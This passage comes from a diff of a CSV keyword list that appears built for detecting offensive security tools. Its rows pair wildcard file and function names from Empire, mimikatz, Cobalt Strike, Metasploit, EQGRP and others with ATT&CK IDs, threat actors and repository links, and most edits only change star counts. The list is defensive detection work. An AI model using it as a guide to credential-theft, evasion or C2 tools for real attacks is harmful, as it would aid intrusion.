","Frameworks","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","3589","533","2023-09-08T05:50:59Z","2019-08-01T04:22:31Z" "*emptybowl.py*","offensive_tool_keyword","EQGRP tools","Equation Group hack tool leaked by ShadowBrokers- file emptybowl.py RCE for MailCenter Gateway (mcgate) - an application that comes with Asia Info Message Center mailserver buffer overflow allows a string passed to popen() call to be controlled by an attacker arbitraty cmd execute known to work only for AIMC Version 2.9.5.1","T1053 - T1064 - T1059 - T1218","TA0002 - TA0007","N/A","N/A","Web Attacks","https://github.com/x0rz/EQGRP/blob/master/Linux/bin/emptybowl.py","1","1","N/A","N/A","10","4011","2166","2017-05-24T21:12:59Z","2017-04-08T14:03:59Z" "*enable_persistence.py*","offensive_tool_keyword","FudgeC2","FudgeC2 - a command and control framework designed for team collaboration and post-exploitation activities.","T1021.002 - T1105 - T1059.001 - T1059.003","TA0008 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/Ziconius/FudgeC2","1","1","N/A","10","10","237","54","2023-05-01T21:13:56Z","2018-09-09T21:05:21Z" "*Enable_Privilege /Process:* /Privilege:*","offensive_tool_keyword","Tokenvator","A tool to elevate privilege with Windows Tokens","T1134 - T1078","TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/0xbadjuju/Tokenvator","1","0","N/A","N/A","10","968","208","2023-02-21T18:07:02Z","2017-12-08T01:29:11Z" -"*EnableAllParentPrivileges.c*","offensive_tool_keyword","PSBits","Simple tool enabling all privileges in the parent process (usually cmd.exe) token. Useful if you have SeBackup or SeRestore and need a cmd.exe ignoring all ACLs","T1548 T1562 T1027 ","N/A","N/A","N/A","Defense Evasion","https://github.com/gtworek/PSBits/tree/master/EnableAllParentPrivileges","1","1","N/A","N/A","10","2669","471","2023-09-28T06:10:58Z","2019-06-29T13:22:36Z" -"*EnableAllParentPrivileges.exe*","offensive_tool_keyword","PSBits","Simple tool enabling all privileges in the parent process (usually cmd.exe) token. Useful if you have SeBackup or SeRestore and need a cmd.exe ignoring all ACLs","T1548 T1562 T1027 ","N/A","N/A","N/A","Defense Evasion","https://github.com/gtworek/PSBits/tree/master/EnableAllParentPrivileges","1","1","N/A","N/A","10","2669","471","2023-09-28T06:10:58Z","2019-06-29T13:22:36Z" -"*Enabled_Users1.txt*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2960","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" -"*Enable-DuplicateToken*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7849","2360","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z" +"*EnableAllParentPrivileges.c*","offensive_tool_keyword","PSBits","Simple tool enabling all privileges in the parent process (usually cmd.exe) token. Useful if you have SeBackup or SeRestore and need a cmd.exe ignoring all ACLs","T1548 T1562 T1027 ","N/A","N/A","N/A","Defense Evasion","https://github.com/gtworek/PSBits/tree/master/EnableAllParentPrivileges","1","1","N/A","N/A","10","2670","471","2023-09-28T06:10:58Z","2019-06-29T13:22:36Z" +"*EnableAllParentPrivileges.exe*","offensive_tool_keyword","PSBits","Simple tool enabling all privileges in the parent process (usually cmd.exe) token. Useful if you have SeBackup or SeRestore and need a cmd.exe ignoring all ACLs","T1548 T1562 T1027 ","N/A","N/A","N/A","Defense Evasion","https://github.com/gtworek/PSBits/tree/master/EnableAllParentPrivileges","1","1","N/A","N/A","10","2670","471","2023-09-28T06:10:58Z","2019-06-29T13:22:36Z" +"*Enabled_Users1.txt*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*Enable-DuplicateToken*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7851","2361","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z" "*EnableRDesktopImplant*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" -"*Enable-SeAssignPrimaryTokenPrivilege*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*Enable-SeDebugPrivilege*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1102","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*Enable-SeDebugPrivilege*","offensive_tool_keyword","mimikatz","Invoke-Mimikatz.ps1 function name","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Invoke-Mimikatz.ps1","1","1","N/A","10","10","10978","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" -"*encdatavault2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" -"*encfs2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*Enable-SeAssignPrimaryTokenPrivilege*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Enable-SeDebugPrivilege*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1102","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Enable-SeDebugPrivilege*","offensive_tool_keyword","mimikatz","Invoke-Mimikatz.ps1 function name","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Invoke-Mimikatz.ps1","1","1","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" +"*encdatavault2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*encfs2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" "*encode_payload rc4 *.txt*","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","0","N/A","10","10","1523","344","2023-03-24T16:50:08Z","2017-01-28T14:56:47Z" "*EncodeGroup/AggressiveProxy*","offensive_tool_keyword","cobaltstrike","Project to enumerate proxy configurations and generate shellcode from CobaltStrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EncodeGroup/AggressiveProxy","1","1","N/A","10","10","139","26","2020-11-04T16:08:11Z","2020-11-04T12:53:00Z" -"*EncodeGroup/UAC-SilentClean*","offensive_tool_keyword","cobaltstrike","New UAC bypass for Silent Cleanup for CobaltStrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EncodeGroup/UAC-SilentClean","1","1","N/A","10","10","173","32","2021-07-14T13:51:02Z","2020-10-07T13:25:21Z" +"*EncodeGroup/UAC-SilentClean*","offensive_tool_keyword","cobaltstrike","New UAC bypass for Silent Cleanup for CobaltStrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EncodeGroup/UAC-SilentClean","1","1","N/A","10","10","174","32","2021-07-14T13:51:02Z","2020-10-07T13:25:21Z" "*encodeScriptPolyglot*","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z" "*EncodeShellcode(*","offensive_tool_keyword","HardHatC2","A C# Command & Control framework","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/DragoQCC/HardHatC2","1","1","N/A","10","10","825","133","2023-09-06T05:17:05Z","2022-12-08T19:40:47Z" "*encrypt.py *.bin -p * -o *.enc*","offensive_tool_keyword","Dinjector","Collection of shellcode injection techniques packed in a D/Invoke weaponized DLL","T1055 - T1055.012 - T1055.001 - T1027.002","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/Metro-Holografix/DInjector","1","0","private github repo","10","","N/A","","","" "*encrypt/encryptFile.go*","offensive_tool_keyword","cobaltstrike","Implement load Cobalt Strike & Metasploit&Sliver shellcode with golang","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/zha0gongz1/DesertFox","1","1","N/A","10","10","123","26","2023-02-02T07:02:12Z","2021-02-04T09:04:13Z" "*encrypt/encryptUrl.go*","offensive_tool_keyword","cobaltstrike","Implement load Cobalt Strike & Metasploit&Sliver shellcode with golang","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/zha0gongz1/DesertFox","1","1","N/A","10","10","123","26","2023-02-02T07:02:12Z","2021-02-04T09:04:13Z" -"*Encrypt-Bytes*","offensive_tool_keyword","empire","empire function name of agent.ps1.Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1055","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*encrypted_payload*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","0","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*Encrypt-Bytes*","offensive_tool_keyword","empire","empire function name of agent.ps1.Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1055","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*encrypted_payload*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","0","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*EncryptedPfx.py*","offensive_tool_keyword","ADFSpoof","A python tool to forge AD FS security tokens.","T1600 - T1600.001 - T1552 - T1552.004","TA0006 - TA0001","N/A","N/A","Sniffing & Spoofing","https://github.com/mandiant/ADFSpoof","1","0","N/A","10","4","300","52","2023-09-21T17:14:52Z","2019-03-20T22:30:58Z" -"*EncryptedZIP.csproj*","offensive_tool_keyword","EncryptedZIP","Compresses a directory or file and then encrypts the ZIP file with a supplied key using AES256 CFB. This assembly also clears the key out of memory using RtlZeroMemory","T1564.001 - T1027 - T1214.001","TA0005 - TA0010","N/A","N/A","Defense Evasion","https://github.com/matterpreter/OffensiveCSharp/tree/master/EncryptedZIP","1","1","N/A","10","10","1214","251","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" -"*EncryptedZIP.exe*","offensive_tool_keyword","EncryptedZIP","Compresses a directory or file and then encrypts the ZIP file with a supplied key using AES256 CFB. This assembly also clears the key out of memory using RtlZeroMemory","T1564.001 - T1027 - T1214.001","TA0005 - TA0010","N/A","N/A","Defense Evasion","https://github.com/matterpreter/OffensiveCSharp/tree/master/EncryptedZIP","1","1","N/A","10","10","1214","251","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" -"*EncryptShellcode(*","offensive_tool_keyword","cobaltstrike","ScareCrow - Payload creation framework designed around EDR bypass.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - 